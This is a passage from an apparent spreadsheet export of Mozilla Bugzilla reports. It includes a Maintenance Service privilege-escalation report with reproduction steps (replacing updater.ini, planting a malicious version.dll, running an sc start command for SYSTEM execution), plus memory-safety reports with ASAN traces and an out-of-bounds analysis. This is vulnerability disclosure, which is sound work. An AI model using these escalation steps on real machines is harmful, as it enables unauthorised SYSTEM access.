After `updater.exe` finishes applying `update.mar`, it runs the program specified in [PostUpdateWin] section in `updater.ini`. We specify a full path for `ExeRelPath`. It has to be Mozilla-signed, but since the attacker has total control of the directory, we can use DLL injection to run attacker's code. For example, we can place a malicious `version.dll` in the same directory as `ExeRelPath`. The code in `version.dll` will run with SYSTEM privilege.
Reproduce: (Test environment: OS: Windows 10 x64 Build 19041.264. Firefox version: 76.0.1)
1. Uninstall your current Firefox, and then install it to `C:\Common\Mozilla Firefox`
2. Log in a standard Windows user account
3. Create folder C:\test\poc
4. Unzip the attachment to C:\test\poc
5. Download https://archive.mozilla.org/pub/firefox/releases/51.0.1/update/win32/en-US/firefox-51.0.1.complete.mar, and save it to `C:\test\poc\123\updates\0\update.mar`
6. There are two files under `C:\test\poc\copy to Firefox install dir`: `updater.exe` and `updater.ini`. Copy them to your Firefox installation directory, overwriting the existing ones.
7. Open cmd.exe . Run `sc start MozillaMaintenance MozillaMaintenance software-update unused C:\test\poc\123\updates\0 "C:\Common\Mozilla Firefox" "C:\Common\Mozilla Firefox\updated" -1 . C:\test\poc\uninstall.update`
8. After a few seconds, you can see the poc creates a file "C:\DLLPlanting\dll_output.txt", whose content is: `Filename=C:\test\poc\fakesetup.exe   Integrity level=System`, which proves the PoC is run with SYSTEM privilege.</t>
        </is>
      </c>
      <c r="X1231" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" t="n">
        <v>404286</v>
      </c>
      <c r="B1232" t="inlineStr">
        <is>
          <t>2007-11-18 16:12:59 -0800</t>
        </is>
      </c>
      <c r="C1232" t="inlineStr">
        <is>
          <t>ShortBufferException in Mozilla-JSS CipherSpi</t>
        </is>
      </c>
      <c r="D1232" t="inlineStr">
        <is>
          <t>2008-01-31 10:38:17 -0800</t>
        </is>
      </c>
      <c r="E1232" t="n">
        <v>1</v>
      </c>
      <c r="F1232" t="n">
        <v>1</v>
      </c>
      <c r="G1232" t="n">
        <v>6</v>
      </c>
      <c r="H1232" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1232" t="inlineStr">
        <is>
          <t>JSS Graveyard</t>
        </is>
      </c>
      <c r="J1232" t="inlineStr">
        <is>
          <t>Library</t>
        </is>
      </c>
      <c r="K1232" t="inlineStr">
        <is>
          <t>4.2.5</t>
        </is>
      </c>
      <c r="L1232" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1232" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1232" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1232" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1232" t="inlineStr"/>
      <c r="Q1232" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1232" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1232" t="inlineStr">
        <is>
          <t>4.2.6</t>
        </is>
      </c>
      <c r="T1232" t="n">
        <v>1</v>
      </c>
      <c r="U1232" t="n">
        <v>0</v>
      </c>
      <c r="V1232" t="n">
        <v>13</v>
      </c>
      <c r="W1232" t="inlineStr">
        <is>
          <t>Reported internally at Sun by Olaf Hey:
Caused by: javax.crypto.ShortBufferException: 32 needed, 20480 supplied
         at
org.mozilla.jss.provider.javax.crypto.JSSCipherSpi.engineUpdate(JSSCipherSpi.java:338)
         at javax.crypto.Cipher.update(DashoA12275)
         at com.jcraft.jsch.jce.TripleDESCBC.update(TripleDESCBC.java:81)</t>
        </is>
      </c>
      <c r="X1232" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" t="n">
        <v>599039</v>
      </c>
      <c r="B1233" t="inlineStr">
        <is>
          <t>2010-09-23 11:23:23 -0700</t>
        </is>
      </c>
      <c r="C1233" t="inlineStr">
        <is>
          <t>[tracker] Client Side Editor</t>
        </is>
      </c>
      <c r="D1233" t="inlineStr">
        <is>
          <t>2010-11-11 12:50:03 -0800</t>
        </is>
      </c>
      <c r="E1233" t="n">
        <v>1</v>
      </c>
      <c r="F1233" t="n">
        <v>1</v>
      </c>
      <c r="G1233" t="n">
        <v>5</v>
      </c>
      <c r="H1233" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1233" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1233" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1233" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1233" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1233" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1233" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1233" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1233" t="inlineStr"/>
      <c r="Q1233" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1233" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1233" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T1233" t="n">
        <v>1</v>
      </c>
      <c r="U1233" t="n">
        <v>0</v>
      </c>
      <c r="V1233" t="n">
        <v>3</v>
      </c>
      <c r="W1233" t="inlineStr">
        <is>
          <t>Our js wiki editor needs to be updated with a couple of new features such as ShowFor, Media Gallery inserts, insert a link modal, etc.
I am making this a tracker since those can be split into at least 3 separate bugs already.</t>
        </is>
      </c>
      <c r="X1233" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" t="n">
        <v>387258</v>
      </c>
      <c r="B1234" t="inlineStr">
        <is>
          <t>2007-07-07 12:25:17 -0700</t>
        </is>
      </c>
      <c r="C1234" t="inlineStr">
        <is>
          <t>plain text txt file viewing capability lost after having downloaded a txt file with content-disposition: attachment and content-type: plain/text</t>
        </is>
      </c>
      <c r="D1234" t="inlineStr">
        <is>
          <t>2016-08-26 13:34:34 -0700</t>
        </is>
      </c>
      <c r="E1234" t="n">
        <v>1</v>
      </c>
      <c r="F1234" t="n">
        <v>1</v>
      </c>
      <c r="G1234" t="n">
        <v>6</v>
      </c>
      <c r="H1234" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1234" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1234" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1234" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1234" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1234" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1234" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1234" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1234" t="inlineStr">
        <is>
          <t>[sg:low] persistent DoS</t>
        </is>
      </c>
      <c r="Q1234" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1234" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1234" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1234" t="n">
        <v>1</v>
      </c>
      <c r="U1234" t="n">
        <v>0</v>
      </c>
      <c r="V1234" t="n">
        <v>25</v>
      </c>
      <c r="W1234" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12
After having downloaded a txt file attachment from a post on a vBulletin messageboard, Firefox will no longer open plain text files in the browser for viewing, instead prompting a download box asking how to save the file instead.
After a little snooping around I noticed that when a plain text file with header options content-disposition: attachment and content-type: text/plain is downloaded a few lines regarding text/plain are added to the mimeTypes.rdf file of the active profile:
-------------------------------------------
&lt;RDF:Description RDF:about="urn:mimetype:plain/text"
        NC:value="plain/text"
        NC:editable="true"
        NC:fileExtensions="txt"
        NC:description="Text Document"&gt;
    &lt;NC:handlerProp RDF:resource="urn:mimetype:handler:plain/text"/&gt;
&lt;/RDF:Description&gt;
&lt;RDF:Seq RDF:about="urn:mimetypes:root"&gt;
    &lt;RDF:li RDF:resource="urn:mimetype:plain/text"/&gt;
&lt;/RDF:Seq&gt;
&lt;RDF:Description RDF:about="urn:mimetype:handler:plain/text"
        NC:alwaysAsk="true"
        NC:saveToDisk="true"&gt;
    &lt;NC:externalApplication RDF:resource="urn:mimetype:externalApplication:plain/text"/&gt;
&lt;/RDF:Description&gt; 
-------------------------------------------
With these lines present in mimeTypes.rdf I get prompted with the download box. Manual removal of these lines restores Firefox' capability to view text files in the browser.
Unless the user figures this out and knows his way around manually altering the mimeTypes.rdf file (because these text/plain associations don't show up in the Download Actions window) this is a permanent feature destroying bug.
Reproducible: Always
Steps to Reproduce:
1. Download a txt file with content-disposition: attachment and content-type: text/plain. (Verified through text file attachments on vBulletin messageboards, which exhibit this behaviour.)
2. Open a local txt file in Firefox or navigate to a remote one.
Actual Results:  
Firefox will pop open a download box and ask how to save the 'opened' txt file.
Expected Results:  
Firefox opens the txt file for viewing in the browser</t>
        </is>
      </c>
      <c r="X1234" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" t="n">
        <v>189570</v>
      </c>
      <c r="B1235" t="inlineStr">
        <is>
          <t>2003-01-17 23:57:21 -0800</t>
        </is>
      </c>
      <c r="C1235" t="inlineStr">
        <is>
          <t>Aborting a page load causes untransferred content that already exists to be doomed from the disk cache</t>
        </is>
      </c>
      <c r="D1235" t="inlineStr">
        <is>
          <t>2006-05-04 11:53:20 -0700</t>
        </is>
      </c>
      <c r="E1235" t="n">
        <v>1</v>
      </c>
      <c r="F1235" t="n">
        <v>1</v>
      </c>
      <c r="G1235" t="n">
        <v>3</v>
      </c>
      <c r="H1235" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1235" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1235" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1235" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1235" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1235" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1235" t="inlineStr">
        <is>
          <t>[FF2]</t>
        </is>
      </c>
      <c r="Q1235" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1235" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1235" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T1235" t="n">
        <v>1</v>
      </c>
      <c r="U1235" t="n">
        <v>3</v>
      </c>
      <c r="V1235" t="n">
        <v>11</v>
      </c>
      <c r="W1235" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.3a) Gecko/20030113
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.3a) Gecko/20030113
This bug is present all the way back to Mozilla 1.1, and maybe before (I didn't
check any earlier versions.)
According to the code around line 1346 in nsHttpChannel.cpp, entries from the
cache are deleted if they are opened for writing or read/write.  This means all
page aborts (either by the stop button/esc or clicking on a link before the page
completes) delete entries from the cache that were there on a previous visit. 
This causes a major performance hit during revisits if the user doesn't let
every web page they visit completely finish before clicking on a link to go
somewhere else.  (And at 21600 bps, that's a long wait!)  The deletions are
unnecessary and impractical.
Reproducible: Always
Steps to Reproduce:
1. Find a slow connection, or simulate one.
2. Set the cache update mode to something other than "never".
3. Go to yerf.com/recent.html (or any page with lots of images that revalidate
(do conditional GETs) when you revisit them.)
4. Visit the page once and allow all of the thumbnail images to transfer and the
Mozilla throbber to stop moving.
5. Renew the session by closing and restarting the browser (or whatever is
necessary to get the page to revalidate the images (do conditional GETs)
6. Stop the loading of the page before all of the thumbnails on the page load.
7. Switch to offline mode and browse away and then back to the page.
Actual Results:  
The images that didn't transfer now show the placeholders and a broken image
icon, and about:cache shows that they have been deleted.  Enabling logging shows
that all of the entries that were never transferred get a "dooming cache
entry!!" message in the log.
Expected Results:  
Revisiting the page that was aborted should still have the images present in the
cache.
These incomplete page loads are the actual cause of the bug I thought was
related to expire times I reported last week.
I'm not sure what the purpose of deleting any entry that has been opened for
writing is?  It seems to me that if the cache entry is opened for writing,
either it's been replaced by valid complete new data, partial new data, or it
hasn't been actually written to at all.  If it's partial, shouldn't the browser
just store the partial entry and do a byte-range get the next time around?
Maybe the real problem (and solution) is when a user aborts a page,
NS_FAILED(status) shouldn't return TRUE if the 'error' was simply the user
clicking a new URL or pressing stop?
If that won't work, then the only solution is to flag whether any data actually
gets written to an entry and only doom the entry if that is the case.  (Though
again that seems to defeat the whole purpose of resuming a partial transfer.)</t>
        </is>
      </c>
      <c r="X1235" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" t="n">
        <v>1092370</v>
      </c>
      <c r="B1236" t="inlineStr">
        <is>
          <t>2014-10-31 14:35:08 -0700</t>
        </is>
      </c>
      <c r="C1236" t="inlineStr">
        <is>
          <t>Stack-buffer-underflow in mozilla::MP3FrameParser::ParseBuffer</t>
        </is>
      </c>
      <c r="D1236" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:07 -0700</t>
        </is>
      </c>
      <c r="E1236" t="n">
        <v>1</v>
      </c>
      <c r="F1236" t="n">
        <v>1</v>
      </c>
      <c r="G1236" t="n">
        <v>3</v>
      </c>
      <c r="H1236" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1236" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1236" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1236" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1236" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1236" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1236" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1236" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1236" t="inlineStr">
        <is>
          <t>[adv-main36+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q1236" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1236" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1236" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T1236" t="n">
        <v>1</v>
      </c>
      <c r="U1236" t="n">
        <v>0</v>
      </c>
      <c r="V1236" t="n">
        <v>27</v>
      </c>
      <c r="W1236" t="inlineStr">
        <is>
          <t>Created attachment 8515284
repro-file.mp3
Tested on:
OS: Ubuntu 14.04
Firefox: ASAN build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1414786499/
ASAN-trace:
==22054==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7fb891d460b9 at pc 0x7fb8c5380eaa bp 0x7fb891d45ea0 sp 0x7fb891d45e98
READ of size 1 at 0x7fb891d460b9 thread T46 (Media Decode #1)
    #0 0x7fb8c5380ea9 in mozilla::MP3FrameParser::ParseBuffer(unsigned char const*, unsigned int, long, unsigned int*) /builds/slave/m-cen-l64-asan-000000000000000/build/dom/media/MP3FrameParser.cpp:336:0
    #1 0x7fb8c53812a7 in mozilla::MP3FrameParser::Parse(char const*, unsigned int, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/dom/media/MP3FrameParser.cpp:470:0
    #2 0x7fb8c5632a08 in mozilla::GStreamerReader::ParseMP3Headers() /builds/slave/m-cen-l64-asan-000000000000000/build/dom/media/gstreamer/GStreamerReader.cpp:285:0
    #3 0x7fb8c5632e63 in mozilla::GStreamerReader::ReadMetadata(mozilla::MediaInfo*, nsDataHashtable&lt;nsCStringHashKey, nsCString&gt;**) /builds/slave/m-cen-l64-asan-000000000000000/build/dom/media/gstreamer/GStreamerReader.cpp:326:0
    #4 0x7fb8c53c98dd in mozilla::MediaDecoderStateMachine::DecodeMetadata() /builds/slave/m-cen-l64-asan-000000000000000/build/dom/media/MediaDecoderStateMachine.cpp:1948:0
    #5 0x7fb8c53c7162 in mozilla::MediaDecoderStateMachine::CallDecodeMetadata() /builds/slave/m-cen-l64-asan-000000000000000/build/dom/media/MediaDecoderStateMachine.cpp:1924:0
    #6 0x7fb8c54254b0 in nsRunnableMethodImpl&lt;void (mozilla::MediaDecoderStateMachine::*)(), void, true&gt;::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/dom/media/../../dist/include/nsThreadUtils.h:388:0
.
.
.
Address 0x7fb891d460b9 is located in stack of thread T46 (Media Decode #1) at offset 25 in frame
    #0 0x7fb8c563283f in mozilla::GStreamerReader::ParseMP3Headers() /builds/slave/m-cen-l64-asan-000000000000000/build/dom/media/gstreamer/GStreamerReader.cpp:272:0
  This frame has 2 object(s):
    [32, 4128) 'bytes' &lt;== Memory access at offset 25 underflows this variable
    [4256, 4260) 'bytesRead'
Thread T46 (Media Decode #1) created by T45 (Media S~hine #1) here:
    #0 0x45e5e5 in __interceptor_pthread_create _asan_rtl_:0
    #1 0x7fb8ce970d8d in _PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/nsprpub/pr/src/pthreads/ptthread.c:453:0
    #2 0x7fb8ce97090a in PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/nsprpub/pr/src/pthreads/ptthread.c:544:0
    #3 0x7fb8c15134db in nsThread::Init() /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsThread.cpp:455:0
    #4 0x7fb8c1518d3c in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsThreadManager.cpp:269:0
    #5 0x7fb8c151a298 in nsThreadPool::PutEvent(nsIRunnable*) /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsThreadPool.cpp:101:0
    #6 0x7fb8c151b9d9 in nsThreadPool::Dispatch(nsIRunnable*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsThreadPool.cpp:261:0
    #7 0x7fb8c5418cbb in mozilla::MediaTaskQueue::DispatchLocked(mozilla::TemporaryRef&lt;nsIRunnable&gt;, mozilla::MediaTaskQueue::DispatchMode) /builds/slave/m-cen-l64-asan-000000000000000/build/dom/media/MediaTaskQueue.cpp:53:0</t>
        </is>
      </c>
      <c r="X1236" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" t="n">
        <v>923270</v>
      </c>
      <c r="B1237" t="inlineStr">
        <is>
          <t>2013-10-02 13:21:51 -0700</t>
        </is>
      </c>
      <c r="C1237" t="inlineStr">
        <is>
          <t>[traceback] ZeroDivisionError: float division</t>
        </is>
      </c>
      <c r="D1237" t="inlineStr">
        <is>
          <t>2013-10-14 08:51:27 -0700</t>
        </is>
      </c>
      <c r="E1237" t="n">
        <v>1</v>
      </c>
      <c r="F1237" t="n">
        <v>1</v>
      </c>
      <c r="G1237" t="n">
        <v>5</v>
      </c>
      <c r="H1237" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1237" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1237" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1237" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1237" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1237" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1237" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1237" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1237" t="inlineStr">
        <is>
          <t>u=contributor c=dashboards p=0 s=2013.20</t>
        </is>
      </c>
      <c r="Q1237" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1237" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1237" t="inlineStr">
        <is>
          <t>2013Q4</t>
        </is>
      </c>
      <c r="T1237" t="n">
        <v>1</v>
      </c>
      <c r="U1237" t="n">
        <v>0</v>
      </c>
      <c r="V1237" t="n">
        <v>6</v>
      </c>
      <c r="W1237" t="inlineStr">
        <is>
          <t>This is getting kicked up by the update_l10n_coverage_metrics cron job since Webmaker got activated yesterday or the day before:
Traceback (most recent call last):
  File "manage.py", line 47, in &lt;module&gt;
    execute_manager(settings)
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django/django/core/management/__init__.py", line 459, in execute_manager
    utility.execute()
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django/django/core/management/__init__.py", line 382, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django/django/core/management/base.py", line 196, in run_from_argv
    self.execute(*args, **options.__dict__)
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django/django/core/management/base.py", line 232, in execute
    output = self.handle(*args, **options)
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django-cronjobs/cronjobs/management/commands/cron.py", line 38, in handle
    registered[script](*args)
  File "/data/support/www/support.mozilla.org/kitsune/kitsune/dashboards/cron.py", line 64, in update_l10n_coverage_metrics
    percent = 100.0 * float(all_['numerator']) / all_['denominator']
ZeroDivisionError: float division</t>
        </is>
      </c>
      <c r="X1237" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" t="n">
        <v>718653</v>
      </c>
      <c r="B1238" t="inlineStr">
        <is>
          <t>2012-01-17 07:15:48 -0800</t>
        </is>
      </c>
      <c r="C1238" t="inlineStr">
        <is>
          <t>Mobile templates for marketplace AAQ</t>
        </is>
      </c>
      <c r="D1238" t="inlineStr">
        <is>
          <t>2012-03-07 12:08:19 -0800</t>
        </is>
      </c>
      <c r="E1238" t="n">
        <v>1</v>
      </c>
      <c r="F1238" t="n">
        <v>1</v>
      </c>
      <c r="G1238" t="n">
        <v>5</v>
      </c>
      <c r="H1238" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1238" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1238" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1238" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1238" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1238" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1238" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1238" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1238" t="inlineStr">
        <is>
          <t>u=user c=questions s=2012.5 p=1</t>
        </is>
      </c>
      <c r="Q1238" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1238" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1238" t="inlineStr">
        <is>
          <t>2012Q1</t>
        </is>
      </c>
      <c r="T1238" t="n">
        <v>1</v>
      </c>
      <c r="U1238" t="n">
        <v>0</v>
      </c>
      <c r="V1238" t="n">
        <v>5</v>
      </c>
      <c r="W1238" t="inlineStr">
        <is>
          <t>Bug 714798 takes care of our full desktop templates. Mobile optimized templates are probably important for marketplace.</t>
        </is>
      </c>
      <c r="X1238" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" t="n">
        <v>1841050</v>
      </c>
      <c r="B1239" t="inlineStr">
        <is>
          <t>2023-06-29 03:47:08 -0700</t>
        </is>
      </c>
      <c r="C1239" t="inlineStr">
        <is>
          <t>Out-of-bound memory access in WebGL2 blitFramebuffer</t>
        </is>
      </c>
      <c r="D1239" t="inlineStr">
        <is>
          <t>2024-06-22 19:59:59 -0700</t>
        </is>
      </c>
      <c r="E1239" t="n">
        <v>1</v>
      </c>
      <c r="F1239" t="n">
        <v>1</v>
      </c>
      <c r="G1239" t="n">
        <v>3</v>
      </c>
      <c r="H1239" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1239" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1239" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1239" t="inlineStr">
        <is>
          <t>Firefox 116</t>
        </is>
      </c>
      <c r="L1239" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1239" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1239" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1239" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1239" t="inlineStr">
        <is>
          <t>[adv-main120+][adv-esr115.5+]</t>
        </is>
      </c>
      <c r="Q1239" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1239" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1239" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T1239" t="n">
        <v>1</v>
      </c>
      <c r="U1239" t="n">
        <v>0</v>
      </c>
      <c r="V1239" t="n">
        <v>37</v>
      </c>
      <c r="W1239" t="inlineStr">
        <is>
          <t>Created attachment 9341705
blit.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Steps to reproduce:
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
When accessing the POC file from the browser, an out-of-bounds error occurs, leading to the termination of the GPU process.
In a typical environment, it works well, but in a VM, it may need the "webgl.force-enabled" option set to true to be triggered.
Actual results:
An out-of-bound bug occurs when calculating the sourcePixel in the BlitD24S8ToD32F function.
This function is as follows.
```javascript
for (int row = 0; row &lt; destArea.height; ++row)
{
    for (int column = 0; column &lt; destArea.width; ++column)
    {
        ptrdiff_t offset         = row * sourceRowPitch + column * srcPixelStride;
        const float *sourcePixel = reinterpret_cast&lt;const float *&gt;(sourceData + offset);
        float *destPixel =
            reinterpret_cast&lt;float *&gt;(destData + row * destRowPitch + column * destPixelStride);
        Depth32FStencil8ToDepth32F(sourcePixel, destPixel);
    }
}
```
When calculating the sourcePixel, the offset can be larger than the size of the sourceData, resulting in an out-of-bound bug.
```javascript
sourceData = width*height*srcPixelStride
```
  - width and height are values that can be set in the renderbufferStorage API.
  - srcPixelStride is set to 8 when using DEPTH32F_STENCIL8 foramt in the renderbufferStorage API.
```javascript
offset = row*sourceRowPitch+column+srcPixelStride
```
  - row = dstY0-dstY1
    - dstY0 and dstY1 are values that can be set in the blitFramebuffer API.
  - sourceRowPitch = width*srcPixelStride
    - width is value that can be set in the renderbufferStorage API.
    - srcPixelStride is set to 8 when using DEPTH32F_STENCIL8 foramt in the renderbufferStorage API.
  - column = dstX0-dstX1
    - dstX0 and dstX1 are values that can be set in the blitFramebuffer API.
The size of the sourceData is affected by the width and height values set by the renderbufferStorage API.
If there is no validation for row or column values when calculating offset, an out-of-bound bug will occur.
In fact, there is a check of values for row and column. But this check is wrong.
Row must be verified to be less than width and column less than height. At this time, width and height must be values set by the renderbufferStorage API.
However, row is compared to the width of the canvas object and column is compared to the height of the canvas object.
Therefore, if you set the width and height of the canvas object large, the offset increases a lot.
Expected results:
This bug allows for inserting values obtained through an out-of-bound read into the destPixel. Therefore, this results in information leak.</t>
        </is>
      </c>
      <c r="X1239" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" t="n">
        <v>1299686</v>
      </c>
      <c r="B1240" t="inlineStr">
        <is>
          <t>2016-08-31 17:12:48 -0700</t>
        </is>
      </c>
      <c r="C1240" t="inlineStr">
        <is>
          <t>Integer overflow leading to a buffer overflow in nsScriptLoadHandler</t>
        </is>
      </c>
      <c r="D1240" t="inlineStr">
        <is>
          <t>2024-05-30 09:21:12 -0700</t>
        </is>
      </c>
      <c r="E1240" t="n">
        <v>1</v>
      </c>
      <c r="F1240" t="n">
        <v>1</v>
      </c>
      <c r="G1240" t="n">
        <v>3</v>
      </c>
      <c r="H1240" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1240" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1240" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1240" t="inlineStr">
        <is>
